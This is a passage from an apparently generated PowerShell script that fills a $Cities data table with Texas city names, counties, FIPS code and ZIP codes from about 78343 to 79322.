$Cities.Rows.Add("Bishop","Nueces","Texas","TX","48","78343") + $null = $Cities.Rows.Add("Bruni","Webb","Texas","TX","48","78344") + $null = $Cities.Rows.Add("Chapman ranch","Nueces","Texas","TX","48","78347") + $null = $Cities.Rows.Add("Concepcion","Duval","Texas","TX","48","78349") + $null = $Cities.Rows.Add("Driscoll","Nueces","Texas","TX","48","78351") + $null = $Cities.Rows.Add("Edroy","San Patricio","Texas","TX","48","78352") + $null = $Cities.Rows.Add("Encino","Brooks","Texas","TX","48","78353") + $null = $Cities.Rows.Add("Falfurrias","Brooks","Texas","TX","48","78355") + $null = $Cities.Rows.Add("Freer","Duval","Texas","TX","48","78357") + $null = $Cities.Rows.Add("Fulton","Aransas","Texas","TX","48","78358") + $null = $Cities.Rows.Add("Gregory","San Patricio","Texas","TX","48","78359") + $null = $Cities.Rows.Add("Hebbronville","Jim Hogg","Texas","TX","48","78361") + $null = $Cities.Rows.Add("Ingleside","San Patricio","Texas","TX","48","78362") + $null = $Cities.Rows.Add("Kingsville naval","Kleberg","Texas","TX","48","78363") + $null = $Cities.Rows.Add("Kingsville","Kleberg","Texas","TX","48","78364") + $null = $Cities.Rows.Add("Mathis","San Patricio","Texas","TX","48","78368") + $null = $Cities.Rows.Add("Mirando city","Webb","Texas","TX","48","78369") + $null = $Cities.Rows.Add("Odem","San Patricio","Texas","TX","48","78370") + $null = $Cities.Rows.Add("Oilton","Webb","Texas","TX","48","78371") + $null = $Cities.Rows.Add("Orange grove","Jim Wells","Texas","TX","48","78372") + $null = $Cities.Rows.Add("Port aransas","Nueces","Texas","TX","48","78373") + $null = $Cities.Rows.Add("Portland","San Patricio","Texas","TX","48","78374") + $null = $Cities.Rows.Add("Premont","Jim Wells","Texas","TX","48","78375") + $null = $Cities.Rows.Add("Realitos","Duval","Texas","TX","48","78376") + $null = $Cities.Rows.Add("Refugio","Refugio","Texas","TX","48","78377") + $null = $Cities.Rows.Add("Riviera","Kleberg","Texas","TX","48","78379") + $null = $Cities.Rows.Add("Robstown","Nueces","Texas","TX","48","78380") + $null = $Cities.Rows.Add("Rockport","Aransas","Texas","TX","48","78382") + $null = $Cities.Rows.Add("Sandia","Live Oak","Texas","TX","48","78383") + $null = $Cities.Rows.Add("San diego","Duval","Texas","TX","48","78384") + $null = $Cities.Rows.Add("Sarita","Kenedy","Texas","TX","48","78385") + $null = $Cities.Rows.Add("Sinton","San Patricio","Texas","TX","48","78387") + $null = $Cities.Rows.Add("Skidmore","Bee","Texas","TX","48","78389") + $null = $Cities.Rows.Add("Taft","San Patricio","Texas","TX","48","78390") + $null = $Cities.Rows.Add("Tynan","Bee","Texas","TX","48","78391") + $null = $Cities.Rows.Add("Woodsboro","Refugio","Texas","TX","48","78393") + $null = $Cities.Rows.Add("Zcta 783hh","Aransas","Texas","TX","48","783HH") + $null = $Cities.Rows.Add("Zcta 783xx","Webb","Texas","TX","48","783XX") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78401") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78402") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78404") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78405") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78406") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78407") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78408") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78409") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78410") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78411") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78412") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78413") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78414") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78415") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78416") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78417") + $null = $Cities.Rows.Add("Corpus christi","Nueces","Texas","TX","48","78418") + $null = $Cities.Rows.Add("Zcta 784hh","Nueces","Texas","TX","48","784HH") + $null = $Cities.Rows.Add("Mcallen","Hidalgo","Texas","TX","48","78501") + $null = $Cities.Rows.Add("Mcallen","Hidalgo","Texas","TX","48","78503") + $null = $Cities.Rows.Add("Mcallen","Hidalgo","Texas","TX","48","78504") + $null = $Cities.Rows.Add("Alamo","Hidalgo","Texas","TX","48","78516") + $null = $Cities.Rows.Add("Brownsville","Cameron","Texas","TX","48","78520") + $null = $Cities.Rows.Add("Brownsville","Cameron","Texas","TX","48","78521") + $null = $Cities.Rows.Add("Brownsville","Cameron","Texas","TX","48","78526") + $null = $Cities.Rows.Add("Donna","Hidalgo","Texas","TX","48","78537") + $null = $Cities.Rows.Add("Monte alto","Hidalgo","Texas","TX","48","78538") + $null = $Cities.Rows.Add("Edinburg","Hidalgo","Texas","TX","48","78539") + $null = $Cities.Rows.Add("Elsa","Hidalgo","Texas","TX","48","78543") + $null = $Cities.Rows.Add("Falcon heights","Starr","Texas","TX","48","78545") + $null = $Cities.Rows.Add("Garciasville","Starr","Texas","TX","48","78547") + $null = $Cities.Rows.Add("Grulla","Starr","Texas","TX","48","78548") + $null = $Cities.Rows.Add("Hargill","Hidalgo","Texas","TX","48","78549") + $null = $Cities.Rows.Add("Harlingen","Cameron","Texas","TX","48","78550") + $null = $Cities.Rows.Add("Harlingen","Cameron","Texas","TX","48","78552") + $null = $Cities.Rows.Add("Hidalgo","Hidalgo","Texas","TX","48","78557") + $null = $Cities.Rows.Add("La blanca","Hidalgo","Texas","TX","48","78558") + $null = $Cities.Rows.Add("La feria","Cameron","Texas","TX","48","78559") + $null = $Cities.Rows.Add("La joya","Hidalgo","Texas","TX","48","78560") + $null = $Cities.Rows.Add("La villa","Hidalgo","Texas","TX","48","78562") + $null = $Cities.Rows.Add("Linn","Hidalgo","Texas","TX","48","78563") + $null = $Cities.Rows.Add("Los ebanos","Hidalgo","Texas","TX","48","78565") + $null = $Cities.Rows.Add("Bayview","Cameron","Texas","TX","48","78566") + $null = $Cities.Rows.Add("Lyford","Willacy","Texas","TX","48","78569") + $null = $Cities.Rows.Add("Mercedes","Hidalgo","Texas","TX","48","78570") + $null = $Cities.Rows.Add("Alton","Hidalgo","Texas","TX","48","78572") + $null = $Cities.Rows.Add("Olmito","Cameron","Texas","TX","48","78575") + $null = $Cities.Rows.Add("Penitas","Hidalgo","Texas","TX","48","78576") + $null = $Cities.Rows.Add("Pharr","Hidalgo","Texas","TX","48","78577") + $null = $Cities.Rows.Add("Port isabel","Cameron","Texas","TX","48","78578") + $null = $Cities.Rows.Add("Progreso","Hidalgo","Texas","TX","48","78579") + $null = $Cities.Rows.Add("Raymondville","Willacy","Texas","TX","48","78580") + $null = $Cities.Rows.Add("Rio grande city","Starr","Texas","TX","48","78582") + $null = $Cities.Rows.Add("Rio hondo","Cameron","Texas","TX","48","78583") + $null = $Cities.Rows.Add("Roma","Starr","Texas","TX","48","78584") + $null = $Cities.Rows.Add("San benito","Cameron","Texas","TX","48","78586") + $null = $Cities.Rows.Add("San isidro","Starr","Texas","TX","48","78588") + $null = $Cities.Rows.Add("San juan","Hidalgo","Texas","TX","48","78589") + $null = $Cities.Rows.Add("Santa maria","Cameron","Texas","TX","48","78592") + $null = $Cities.Rows.Add("Santa rosa","Cameron","Texas","TX","48","78593") + $null = $Cities.Rows.Add("Sebastian","Willacy","Texas","TX","48","78594") + $null = $Cities.Rows.Add("Sullivan city","Hidalgo","Texas","TX","48","78595") + $null = $Cities.Rows.Add("Weslaco","Hidalgo","Texas","TX","48","78596") + $null = $Cities.Rows.Add("South padre isla","Cameron","Texas","TX","48","78597") + $null = $Cities.Rows.Add("Port mansfield","Willacy","Texas","TX","48","78598") + $null = $Cities.Rows.Add("Zcta 785hh","Cameron","Texas","TX","48","785HH") + $null = $Cities.Rows.Add("Zcta 785xx","Hidalgo","Texas","TX","48","785XX") + $null = $Cities.Rows.Add("Bastrop","Bastrop","Texas","TX","48","78602") + $null = $Cities.Rows.Add("Bertram","Burnet","Texas","TX","48","78605") + $null = $Cities.Rows.Add("Blanco","Blanco","Texas","TX","48","78606") + $null = $Cities.Rows.Add("Bluffton","Llano","Texas","TX","48","78607") + $null = $Cities.Rows.Add("Briggs","Burnet","Texas","TX","48","78608") + $null = $Cities.Rows.Add("Buchanan dam","Llano","Texas","TX","48","78609") + $null = $Cities.Rows.Add("Buda","Hays","Texas","TX","48","78610") + $null = $Cities.Rows.Add("Burnet","Burnet","Texas","TX","48","78611") + $null = $Cities.Rows.Add("Cedar creek","Bastrop","Texas","TX","48","78612") + $null = $Cities.Rows.Add("Cedar park","Williamson","Texas","TX","48","78613") + $null = $Cities.Rows.Add("Cost","Gonzales","Texas","TX","48","78614") + $null = $Cities.Rows.Add("Coupland","Williamson","Texas","TX","48","78615") + $null = $Cities.Rows.Add("Dale","Caldwell","Texas","TX","48","78616") + $null = $Cities.Rows.Add("Del valle","Travis","Texas","TX","48","78617") + $null = $Cities.Rows.Add("Doss","Gillespie","Texas","TX","48","78618") + $null = $Cities.Rows.Add("Driftwood","Hays","Texas","TX","48","78619") + $null = $Cities.Rows.Add("Dripping springs","Hays","Texas","TX","48","78620") + $null = $Cities.Rows.Add("Elgin","Bastrop","Texas","TX","48","78621") + $null = $Cities.Rows.Add("Fentress","Caldwell","Texas","TX","48","78622") + $null = $Cities.Rows.Add("Fischer","Comal","Texas","TX","48","78623") + $null = $Cities.Rows.Add("Fredericksburg","Gillespie","Texas","TX","48","78624") + $null = $Cities.Rows.Add("Georgetown","Williamson","Texas","TX","48","78626") + $null = $Cities.Rows.Add("Andice","Williamson","Texas","TX","48","78628") + $null = $Cities.Rows.Add("Gonzales","Gonzales","Texas","TX","48","78629") + $null = $Cities.Rows.Add("Harper","Gillespie","Texas","TX","48","78631") + $null = $Cities.Rows.Add("Harwood","Gonzales","Texas","TX","48","78632") + $null = $Cities.Rows.Add("Hutto","Williamson","Texas","TX","48","78634") + $null = $Cities.Rows.Add("Hye","Blanco","Texas","TX","48","78635") + $null = $Cities.Rows.Add("Johnson city","Blanco","Texas","TX","48","78636") + $null = $Cities.Rows.Add("Kingsbury","Guadalupe","Texas","TX","48","78638") + $null = $Cities.Rows.Add("Kingsland","Llano","Texas","TX","48","78639") + $null = $Cities.Rows.Add("Uhland","Hays","Texas","TX","48","78640") + $null = $Cities.Rows.Add("Leander","Williamson","Texas","TX","48","78641") + $null = $Cities.Rows.Add("Liberty hill","Williamson","Texas","TX","48","78642") + $null = $Cities.Rows.Add("Sunrise beach","Llano","Texas","TX","48","78643") + $null = $Cities.Rows.Add("Lockhart","Caldwell","Texas","TX","48","78644") + $null = $Cities.Rows.Add("Jonestown","Travis","Texas","TX","48","78645") + $null = $Cities.Rows.Add("Luling","Caldwell","Texas","TX","48","78648") + $null = $Cities.Rows.Add("Mc dade","Bastrop","Texas","TX","48","78650") + $null = $Cities.Rows.Add("Manchaca","Travis","Texas","TX","48","78652") + $null = $Cities.Rows.Add("Manor","Travis","Texas","TX","48","78653") + $null = $Cities.Rows.Add("Cypress mill","Burnet","Texas","TX","48","78654") + $null = $Cities.Rows.Add("Martindale","Caldwell","Texas","TX","48","78655") + $null = $Cities.Rows.Add("Maxwell","Caldwell","Texas","TX","48","78656") + $null = $Cities.Rows.Add("Zcta 78657","Llano","Texas","TX","48","78657") + $null = $Cities.Rows.Add("Ottine","Gonzales","Texas","TX","48","78658") + $null = $Cities.Rows.Add("Paige","Bastrop","Texas","TX","48","78659") + $null = $Cities.Rows.Add("Pflugerville","Travis","Texas","TX","48","78660") + $null = $Cities.Rows.Add("Prairie lea","Caldwell","Texas","TX","48","78661") + $null = $Cities.Rows.Add("Red rock","Bastrop","Texas","TX","48","78662") + $null = $Cities.Rows.Add("Round mountain","Blanco","Texas","TX","48","78663") + $null = $Cities.Rows.Add("Round rock","Williamson","Texas","TX","48","78664") + $null = $Cities.Rows.Add("San marcos","Hays","Texas","TX","48","78666") + $null = $Cities.Rows.Add("Spicewood","Travis","Texas","TX","48","78669") + $null = $Cities.Rows.Add("Staples","Guadalupe","Texas","TX","48","78670") + $null = $Cities.Rows.Add("Albert","Gillespie","Texas","TX","48","78671") + $null = $Cities.Rows.Add("Tow","Llano","Texas","TX","48","78672") + $null = $Cities.Rows.Add("Willow city","Gillespie","Texas","TX","48","78675") + $null = $Cities.Rows.Add("Wimberley","Hays","Texas","TX","48","78676") + $null = $Cities.Rows.Add("Round rock","Williamson","Texas","TX","48","78681") + $null = $Cities.Rows.Add("Zcta 786hh","Bastrop","Texas","TX","48","786HH") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78701") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78702") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78703") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78704") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78705") + $null = $Cities.Rows.Add("Austin","Williamson","Texas","TX","48","78717") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78719") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78721") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78722") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78723") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78724") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78725") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78726") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78727") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78728") + $null = $Cities.Rows.Add("Austin","Williamson","Texas","TX","48","78729") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78730") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78731") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78732") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78733") + $null = $Cities.Rows.Add("Lakeway","Travis","Texas","TX","48","78734") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78735") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78736") + $null = $Cities.Rows.Add("Austin","Hays","Texas","TX","48","78737") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78738") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78739") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78741") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78742") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78744") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78745") + $null = $Cities.Rows.Add("West lake hills","Travis","Texas","TX","48","78746") + $null = $Cities.Rows.Add("Creedmoor","Travis","Texas","TX","48","78747") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78748") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78749") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78750") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78751") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78752") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78753") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78754") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78756") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78757") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78758") + $null = $Cities.Rows.Add("Austin","Travis","Texas","TX","48","78759") + $null = $Cities.Rows.Add("Zcta 787hh","Travis","Texas","TX","48","787HH") + $null = $Cities.Rows.Add("Uvalde","Uvalde","Texas","TX","48","78801") + $null = $Cities.Rows.Add("Asherton","Dimmit","Texas","TX","48","78827") + $null = $Cities.Rows.Add("Barksdale","Edwards","Texas","TX","48","78828") + $null = $Cities.Rows.Add("Batesville","Zavala","Texas","TX","48","78829") + $null = $Cities.Rows.Add("Big wells","Dimmit","Texas","TX","48","78830") + $null = $Cities.Rows.Add("Brackettville","Kinney","Texas","TX","48","78832") + $null = $Cities.Rows.Add("Camp wood","Real","Texas","TX","48","78833") + $null = $Cities.Rows.Add("Carrizo springs","Dimmit","Texas","TX","48","78834") + $null = $Cities.Rows.Add("Catarina","Dimmit","Texas","TX","48","78836") + $null = $Cities.Rows.Add("Comstock","Val Verde","Texas","TX","48","78837") + $null = $Cities.Rows.Add("Concan","Uvalde","Texas","TX","48","78838") + $null = $Cities.Rows.Add("Crystal city","Zavala","Texas","TX","48","78839") + $null = $Cities.Rows.Add("Laughlin a f b","Val Verde","Texas","TX","48","78840") + $null = $Cities.Rows.Add("D hanis","Medina","Texas","TX","48","78850") + $null = $Cities.Rows.Add("Dryden","Terrell","Texas","TX","48","78851") + $null = $Cities.Rows.Add("Eagle pass","Maverick","Texas","TX","48","78852") + $null = $Cities.Rows.Add("El indio","Maverick","Texas","TX","48","78860") + $null = $Cities.Rows.Add("Dunlay","Medina","Texas","TX","48","78861") + $null = $Cities.Rows.Add("Knippa","Uvalde","Texas","TX","48","78870") + $null = $Cities.Rows.Add("La pryor","Zavala","Texas","TX","48","78872") + $null = $Cities.Rows.Add("Leakey","Real","Texas","TX","48","78873") + $null = $Cities.Rows.Add("Spofford","Maverick","Texas","TX","48","78877") + $null = $Cities.Rows.Add("Rio frio","Real","Texas","TX","48","78879") + $null = $Cities.Rows.Add("Rocksprings","Edwards","Texas","TX","48","78880") + $null = $Cities.Rows.Add("Sabinal","Uvalde","Texas","TX","48","78881") + $null = $Cities.Rows.Add("Tarpley","Bandera","Texas","TX","48","78883") + $null = $Cities.Rows.Add("Utopia","Uvalde","Texas","TX","48","78884") + $null = $Cities.Rows.Add("Vanderpool","Bandera","Texas","TX","48","78885") + $null = $Cities.Rows.Add("Yancey","Medina","Texas","TX","48","78886") + $null = $Cities.Rows.Add("Zcta 788hh","Maverick","Texas","TX","48","788HH") + $null = $Cities.Rows.Add("Zcta 788xx","Val Verde","Texas","TX","48","788XX") + $null = $Cities.Rows.Add("Carmine","Fayette","Texas","TX","48","78932") + $null = $Cities.Rows.Add("Cat spring","Colorado","Texas","TX","48","78933") + $null = $Cities.Rows.Add("Columbus","Colorado","Texas","TX","48","78934") + $null = $Cities.Rows.Add("Alleyton","Colorado","Texas","TX","48","78935") + $null = $Cities.Rows.Add("Ellinger","Fayette","Texas","TX","48","78938") + $null = $Cities.Rows.Add("Fayetteville","Fayette","Texas","TX","48","78940") + $null = $Cities.Rows.Add("Flatonia","Fayette","Texas","TX","48","78941") + $null = $Cities.Rows.Add("Giddings","Lee","Texas","TX","48","78942") + $null = $Cities.Rows.Add("Glidden","Colorado","Texas","TX","48","78943") + $null = $Cities.Rows.Add("Industry","Austin","Texas","TX","48","78944") + $null = $Cities.Rows.Add("La grange","Fayette","Texas","TX","48","78945") + $null = $Cities.Rows.Add("Ledbetter","Lee","Texas","TX","48","78946") + $null = $Cities.Rows.Add("Lexington","Lee","Texas","TX","48","78947") + $null = $Cities.Rows.Add("Lincoln","Lee","Texas","TX","48","78948") + $null = $Cities.Rows.Add("Muldoon","Fayette","Texas","TX","48","78949") + $null = $Cities.Rows.Add("New ulm","Austin","Texas","TX","48","78950") + $null = $Cities.Rows.Add("Rosanky","Bastrop","Texas","TX","48","78953") + $null = $Cities.Rows.Add("Round top","Fayette","Texas","TX","48","78954") + $null = $Cities.Rows.Add("Schulenburg","Fayette","Texas","TX","48","78956") + $null = $Cities.Rows.Add("Smithville","Bastrop","Texas","TX","48","78957") + $null = $Cities.Rows.Add("Waelder","Gonzales","Texas","TX","48","78959") + $null = $Cities.Rows.Add("Warda","Fayette","Texas","TX","48","78960") + $null = $Cities.Rows.Add("Weimar","Colorado","Texas","TX","48","78962") + $null = $Cities.Rows.Add("West point","Fayette","Texas","TX","48","78963") + $null = $Cities.Rows.Add("Zcta 789hh","Bastrop","Texas","TX","48","789HH") + $null = $Cities.Rows.Add("Adrian","Oldham","Texas","TX","48","79001") + $null = $Cities.Rows.Add("Alanreed","Gray","Texas","TX","48","79002") + $null = $Cities.Rows.Add("Allison","Wheeler","Texas","TX","48","79003") + $null = $Cities.Rows.Add("Booker","Lipscomb","Texas","TX","48","79005") + $null = $Cities.Rows.Add("Phillips","Hutchinson","Texas","TX","48","79007") + $null = $Cities.Rows.Add("Bovina","Parmer","Texas","TX","48","79009") + $null = $Cities.Rows.Add("Boys ranch","Oldham","Texas","TX","48","79010") + $null = $Cities.Rows.Add("Briscoe","Wheeler","Texas","TX","48","79011") + $null = $Cities.Rows.Add("Bushland","Potter","Texas","TX","48","79012") + $null = $Cities.Rows.Add("Cactus","Moore","Texas","TX","48","79013") + $null = $Cities.Rows.Add("Glazier","Hemphill","Texas","TX","48","79014") + $null = $Cities.Rows.Add("Canyon","Randall","Texas","TX","48","79015") + $null = $Cities.Rows.Add("Channing","Hartley","Texas","TX","48","79018") + $null = $Cities.Rows.Add("Claude","Armstrong","Texas","TX","48","79019") + $null = $Cities.Rows.Add("Cotton center","Hale","Texas","TX","48","79021") + $null = $Cities.Rows.Add("Dalhart","Dallam","Texas","TX","48","79022") + $null = $Cities.Rows.Add("Darrouzett","Lipscomb","Texas","TX","48","79024") + $null = $Cities.Rows.Add("Dawn","Deaf Smith","Texas","TX","48","79025") + $null = $Cities.Rows.Add("Dimmitt","Castro","Texas","TX","48","79027") + $null = $Cities.Rows.Add("Dumas","Moore","Texas","TX","48","79029") + $null = $Cities.Rows.Add("Earth","Lamb","Texas","TX","48","79031") + $null = $Cities.Rows.Add("Edmonson","Hale","Texas","TX","48","79032") + $null = $Cities.Rows.Add("Farnsworth","Ochiltree","Texas","TX","48","79033") + $null = $Cities.Rows.Add("Follett","Lipscomb","Texas","TX","48","79034") + $null = $Cities.Rows.Add("Black","Parmer","Texas","TX","48","79035") + $null = $Cities.Rows.Add("Fritch","Hutchinson","Texas","TX","48","79036") + $null = $Cities.Rows.Add("Groom","Carson","Texas","TX","48","79039") + $null = $Cities.Rows.Add("Gruver","Hansford","Texas","TX","48","79040") + $null = $Cities.Rows.Add("Hale center","Hale","Texas","TX","48","79041") + $null = $Cities.Rows.Add("Happy","Swisher","Texas","TX","48","79042") + $null = $Cities.Rows.Add("Hart","Castro","Texas","TX","48","79043") + $null = $Cities.Rows.Add("Hartley","Hartley","Texas","TX","48","79044") + $null = $Cities.Rows.Add("Hereford","Deaf Smith","Texas","TX","48","79045") + $null = $Cities.Rows.Add("Higgins","Lipscomb","Texas","TX","48","79046") + $null = $Cities.Rows.Add("Kress","Swisher","Texas","TX","48","79052") + $null = $Cities.Rows.Add("Lazbuddie","Parmer","Texas","TX","48","79053") + $null = $Cities.Rows.Add("Lefors","Gray","Texas","TX","48","79054") + $null = $Cities.Rows.Add("Lipscomb","Lipscomb","Texas","TX","48","79056") + $null = $Cities.Rows.Add("Kellerville","Gray","Texas","TX","48","79057") + $null = $Cities.Rows.Add("Miami","Roberts","Texas","TX","48","79059") + $null = $Cities.Rows.Add("Mobeetie","Wheeler","Texas","TX","48","79061") + $null = $Cities.Rows.Add("Morse","Hansford","Texas","TX","48","79062") + $null = $Cities.Rows.Add("Nazareth","Castro","Texas","TX","48","79063") + $null = $Cities.Rows.Add("Olton","Lamb","Texas","TX","48","79064") + $null = $Cities.Rows.Add("Pampa","Gray","Texas","TX","48","79065") + $null = $Cities.Rows.Add("Panhandle","Carson","Texas","TX","48","79068") + $null = $Cities.Rows.Add("Perryton","Ochiltree","Texas","TX","48","79070") + $null = $Cities.Rows.Add("Plainview","Hale","Texas","TX","48","79072") + $null = $Cities.Rows.Add("Sanford","Hutchinson","Texas","TX","48","79078") + $null = $Cities.Rows.Add("Twitty","Wheeler","Texas","TX","48","79079") + $null = $Cities.Rows.Add("Skellytown","Carson","Texas","TX","48","79080") + $null = $Cities.Rows.Add("Spearman","Hansford","Texas","TX","48","79081") + $null = $Cities.Rows.Add("Springlake","Lamb","Texas","TX","48","79082") + $null = $Cities.Rows.Add("Stinnett","Hutchinson","Texas","TX","48","79083") + $null = $Cities.Rows.Add("Stratford","Sherman","Texas","TX","48","79084") + $null = $Cities.Rows.Add("Sunray","Moore","Texas","TX","48","79086") + $null = $Cities.Rows.Add("Texline","Dallam","Texas","TX","48","79087") + $null = $Cities.Rows.Add("Vigo park","Swisher","Texas","TX","48","79088") + $null = $Cities.Rows.Add("Umbarger","Randall","Texas","TX","48","79091") + $null = $Cities.Rows.Add("Vega","Oldham","Texas","TX","48","79092") + $null = $Cities.Rows.Add("Waka","Ochiltree","Texas","TX","48","79093") + $null = $Cities.Rows.Add("Wellington","Collingsworth","Texas","TX","48","79095") + $null = $Cities.Rows.Add("Wheeler","Wheeler","Texas","TX","48","79096") + $null = $Cities.Rows.Add("White deer","Carson","Texas","TX","48","79097") + $null = $Cities.Rows.Add("Wildorado","Oldham","Texas","TX","48","79098") + $null = $Cities.Rows.Add("Zcta 790hh","Hutchinson","Texas","TX","48","790HH") + $null = $Cities.Rows.Add("Zcta 790xx","Lamb","Texas","TX","48","790XX") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79101") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79102") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79103") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79104") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79106") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79107") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79108") + $null = $Cities.Rows.Add("Amarillo","Randall","Texas","TX","48","79109") + $null = $Cities.Rows.Add("Amarillo","Randall","Texas","TX","48","79110") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79111") + $null = $Cities.Rows.Add("Amarillo","Randall","Texas","TX","48","79118") + $null = $Cities.Rows.Add("Amarillo","Randall","Texas","TX","48","79119") + $null = $Cities.Rows.Add("Amarillo","Randall","Texas","TX","48","79121") + $null = $Cities.Rows.Add("Amarillo","Potter","Texas","TX","48","79124") + $null = $Cities.Rows.Add("Zcta 791hh","Randall","Texas","TX","48","791HH") + $null = $Cities.Rows.Add("Zcta 791xx","Potter","Texas","TX","48","791XX") + $null = $Cities.Rows.Add("Kirkland","Childress","Texas","TX","48","79201") + $null = $Cities.Rows.Add("Afton","Dickens","Texas","TX","48","79220") + $null = $Cities.Rows.Add("Cee vee","Cottle","Texas","TX","48","79223") + $null = $Cities.Rows.Add("Chillicothe","Hardeman","Texas","TX","48","79225") + $null = $Cities.Rows.Add("Clarendon","Donley","Texas","TX","48","79226") + $null = $Cities.Rows.Add("Crowell","Foard","Texas","TX","48","79227") + $null = $Cities.Rows.Add("Dickens","Dickens","Texas","TX","48","79229") + $null = $Cities.Rows.Add("Dodson","Collingsworth","Texas","TX","48","79230") + $null = $Cities.Rows.Add("Dougherty","Floyd","Texas","TX","48","79231") + $null = $Cities.Rows.Add("Dumont","King","Texas","TX","48","79232") + $null = $Cities.Rows.Add("Estelline","Hall","Texas","TX","48","79233") + $null = $Cities.Rows.Add("Flomot","Motley","Texas","TX","48","79234") + $null = $Cities.Rows.Add("Floydada","Floyd","Texas","TX","48","79235") + $null = $Cities.Rows.Add("Guthrie","King","Texas","TX","48","79236") + $null = $Cities.Rows.Add("Hedley","Donley","Texas","TX","48","79237") + $null = $Cities.Rows.Add("Lakeview","Hall","Texas","TX","48","79239") + $null = $Cities.Rows.Add("Lelia lake","Donley","Texas","TX","48","79240") + $null = $Cities.Rows.Add("Lockney","Floyd","Texas","TX","48","79241") + $null = $Cities.Rows.Add("Mcadoo","Dickens","Texas","TX","48","79243") + $null = $Cities.Rows.Add("Matador","Motley","Texas","TX","48","79244") + $null = $Cities.Rows.Add("Memphis","Hall","Texas","TX","48","79245") + $null = $Cities.Rows.Add("Odell","Wilbarger","Texas","TX","48","79247") + $null = $Cities.Rows.Add("Chalk","Cottle","Texas","TX","48","79248") + $null = $Cities.Rows.Add("Petersburg","Hale","Texas","TX","48","79250") + $null = $Cities.Rows.Add("Quail","Collingsworth","Texas","TX","48","79251") + $null = $Cities.Rows.Add("Quanah","Hardeman","Texas","TX","48","79252") + $null = $Cities.Rows.Add("Quitaque","Briscoe","Texas","TX","48","79255") + $null = $Cities.Rows.Add("Roaring springs","Motley","Texas","TX","48","79256") + $null = $Cities.Rows.Add("Silverton","Briscoe","Texas","TX","48","79257") + $null = $Cities.Rows.Add("Tell","Childress","Texas","TX","48","79259") + $null = $Cities.Rows.Add("Turkey","Hall","Texas","TX","48","79261") + $null = $Cities.Rows.Add("Zcta 792hh","Briscoe","Texas","TX","48","792HH") + $null = $Cities.Rows.Add("Zcta 792xx","King","Texas","TX","48","792XX") + $null = $Cities.Rows.Add("Abernathy","Hale","Texas","TX","48","79311") + $null = $Cities.Rows.Add("Amherst","Lamb","Texas","TX","48","79312") + $null = $Cities.Rows.Add("Anton","Hockley","Texas","TX","48","79313") + $null = $Cities.Rows.Add("Bledsoe","Cochran","Texas","TX","48","79314") + $null = $Cities.Rows.Add("Brownfield","Terry","Texas","TX","48","79316") + $null = $Cities.Rows.Add("Bula","Bailey","Texas","TX","48","79320") + $null = $Cities.Rows.Add("Crosbyton","Crosby","Texas","TX","48","79322") + 